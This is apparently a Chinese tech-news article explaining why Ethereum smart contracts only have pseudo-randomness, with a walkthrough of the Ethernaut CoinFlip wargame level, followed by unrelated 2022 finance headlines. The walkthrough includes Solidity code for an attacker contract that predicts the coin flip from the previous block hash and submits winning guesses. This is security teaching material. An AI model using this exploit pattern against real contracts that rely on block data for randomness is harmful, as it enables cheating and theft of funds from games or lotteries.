您的位置:首页 > 互联网 >

以太坊区块链只有伪随机性 提供两种主要加密散列函数

2019-06-20 17:27:03 来源: 区块链研究实验室

以太坊如何产生随机性以太坊区块链上没有真正的随机性,只有被认为足够好的随机生成器。开发人员目前通过在以太坊中的散列独特性或难以篡改

以太坊如何产生“随机性”

以太坊区块链上没有真正的随机性,只有被认为“足够好”的随机生成器。

开发人员目前通过在以太坊中的散列独特性或难以篡改性的变量创建伪随机性。此类变量的示例包括transaction timestamp, sender address, block height 。

以太坊提供两种主要的加密散列函数,即SHA-3和较新的KECCAK256,它们对这些输入变量的串联字符串进行散列。

最终生成的哈希被转换为一个大整数,然后由n修改。 这是为了得到一组离散的概率整数,在0到n的期望范围内。

请注意,在我们的Ethernaut练习中,n = 2代表硬币翻转的两面。

这种在智能合约中导出伪随机性的方法很容容易受到攻击。如果知道输入的黑客可以结此猜出“随机”结果。

这就是解决CoinFlip级别的关键。 在这里,确定硬币翻转的输入变量对于您来说是公开的。

详情演练

我们来创建一个恶意智能合约,检查硬币翻转的结果。

只有当你正确猜到了结果时,你才能调用真实合约的翻转(bool _guess)函数。

1、在Remix IDE中,创建一个与CoinFlip.sol相关的恶意合同:

contract hackCoinFlip {

CoinFlip public originalContract = CoinFlip(

"your instance address");

uint256 FACTOR = 578960446186580977117854925043439539266349923

32820282019728792003956564819968;

function hackFlip(bool _guess) public {

//TODO

}

}

2、实现hackFlip()函数,使用与原始智能合约相同的逻辑和输入变量来预测翻转结果。 既然你知道blockhash和block.number,那么你就能准确预测正确的_guess。

function hackFlip(bool _guess) public {

// pre-deteremine the flip outcome

uint256 blockValue = uint256(block.blockhash(block.number-1));

uint256 coinFlip = blockValue / FACTOR;

bool side = coinFlip == 1 ? true : false;

// If I guessed correctly, submit my guess

if (side == _guess) {

originalContract.flip(_guess);

} else {

// If I guess incorrectly, submit the opposite

originalContract.flip(!_guess);

}

}

3、调用你的hackFlip()函数10次。当您做出正确的猜测时,原始智能合约的consecutiveWins计数器应该逐步增加。

关键安全要点

1. 没有真的随机性。

2. 在计算智能合约中的“随机性”时(或者甚至从现有的随机数库继承)时要格外注意。 如果您使用随机性来确定比赛获胜者,请记住,对手可以轻松猜出随机结果并破解您的游戏!(链三丰)

关键词: 以太坊 伪随机 加密散列函数

精选 导读

募资55亿港元万物云启动招股 预计9月29日登陆港交所主板

万科9月19日早间公告,万物云当日启动招股,预计发行价介乎每股47 1港元至52 7港元,预计9月29日登陆港交所主板。按发行1 167亿股计算,万

发布时间: 2022-09-20 10:39
管理   2022-09-20

公募基金二季度持股情况曝光 隐形重仓股多为高端制造业

随着半年报披露收官,公募基金二季度持股情况曝光。截至今年二季度末,公募基金全市场基金总数为9794只,资产净值为269454 75亿元,同比上

发布时间: 2022-09-02 10:45
资讯   2022-09-02

又有上市公司宣布变卖房产 上市公司粉饰财报动作不断

再有上市公司宣布变卖房产。四川长虹25日称,拟以1 66亿元的转让底价挂牌出售31套房产。今年以来,A股公司出售房产不断。根据记者不完全统

发布时间: 2022-08-26 09:44
资讯   2022-08-26

16天12连板大港股份回复深交所关注函 股份继续冲高

回复交易所关注函后,大港股份继续冲高。8月11日大港股份高开,随后震荡走高,接近收盘时触及涨停,报20 2元 股。值得一提的是,在7月21日

发布时间: 2022-08-12 09:56
资讯   2022-08-12

万家基金再添第二大股东 中泰证券拟受让11%基金股权

7月13日,中泰证券发布公告,拟受让齐河众鑫投资有限公司(以下简称齐河众鑫)所持有的万家基金11%的股权,交易双方共同确定本次交易的标的资

发布时间: 2022-07-14 09:39
管理   2022-07-14

央行连续7日每天30亿元逆回购 对债市影响如何?

央行12日再次开展了30亿元逆回购操作,中标利率2 10%。这已是央行连续7日每天仅进行30亿元的逆回购缩量投放,创下去年1月以来的最低操作规

发布时间: 2022-07-13 09:38
资讯   2022-07-13

美元指数创近20年新高 黄金期货创出逾9个月新低

由于对美联储激进加息的担忧,美元指数11日大涨近1%创出近20年新高。受此影响,欧美股市、大宗商品均走弱,而黄金期货创出逾9个月新低。美

发布时间: 2022-07-13 09:36
资讯   2022-07-13

美股三大股指全线下跌 纳斯达克跌幅创下记录以来最大跌幅

今年上半年,美股持续回落。数据显示,道琼斯指数上半年下跌15 3%,纳斯达克综合指数下跌29 5%,标普500指数下跌20 6%。其中,纳斯达克连续

发布时间: 2022-07-04 09:51
推荐   2022-07-04

融资客热情回升 两市融资余额月内增加超344亿元

近期A股走强,沪指6月以来上涨4%,融资客热情明显回升。数据显示,截至6月16日,两市融资余额1 479万亿元,月内增加344 67亿元,最近一个半

发布时间: 2022-06-20 09:41
资讯   2022-06-20

4个交易日净买入超百亿元 北向资金持续流入A股市场

北向资金净流入态势延续。继6月15日净买入133 59亿元后,北向资金6月16日净买入44 52亿元。自5月27日至今,除6月13日以外,北向资金累计净

发布时间: 2022-06-17 09:37
推荐   2022-06-17